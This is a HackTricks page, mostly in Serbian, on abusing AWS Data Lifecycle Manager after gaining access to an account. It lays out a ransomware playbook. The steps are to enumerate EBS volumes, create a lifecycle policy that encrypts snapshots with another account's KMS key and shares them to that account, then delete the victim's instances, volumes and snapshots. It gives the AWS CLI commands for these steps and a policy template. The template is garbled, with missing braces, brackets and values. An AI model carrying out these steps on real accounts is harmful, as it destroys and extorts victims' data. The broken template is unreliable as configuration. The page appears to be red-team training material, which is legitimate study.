AWS - DLM Post Exploitation

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Upravljanje životnim ciklusom podataka (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

Ransomware napad može biti izvršen enkriptovanjem što većeg broja EBS volumena, a zatim brisanjem trenutnih EC2 instanci, EBS volumena i snimaka. Da bi se automatizovala ova zlonamerna aktivnost, može se koristiti Amazon DLM, enkriptujući snimke sa KMS ključem iz drugog AWS naloga i prenoseći enkriptovane snimke na drugi nalog. Alternativno, mogu se preneti snimci bez enkripcije na nalog koji upravljaju i zatim ih enkriptovati tamo. Iako nije direktno moguće enkriptovati postojeće EBS volumene ili snimke, to je moguće uraditi stvaranjem novog volumena ili snimka.

Prvo, koristiće se komanda za prikupljanje informacija o volumenima, kao što su ID instance, ID volumena, status enkripcije, status prilaganja i tip volumena. aws ec2 describe-volumes

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

aws dlm create-lifecycle-policy --description "Moja prva politika" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json

A template for the policy document can be seen here:
"ResourceTypes": [
"TargetTags": [
"Key": "ExampleKey",
"Value": "ExampleValue"
"Schedules": [
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
"Key": "SnapshotCreator",
"Value": "DLM"
"VariableTags": [
"Key": "CostCenter",
"Value": "Finance"
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"RetainRule": {
"Count": 14
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
"CrossRegionCopyRules": [
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
"ShareRules": [
"TargetAccounts": [
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
"Parameters": {
"ExcludeBootVolume": false


<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href=""><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

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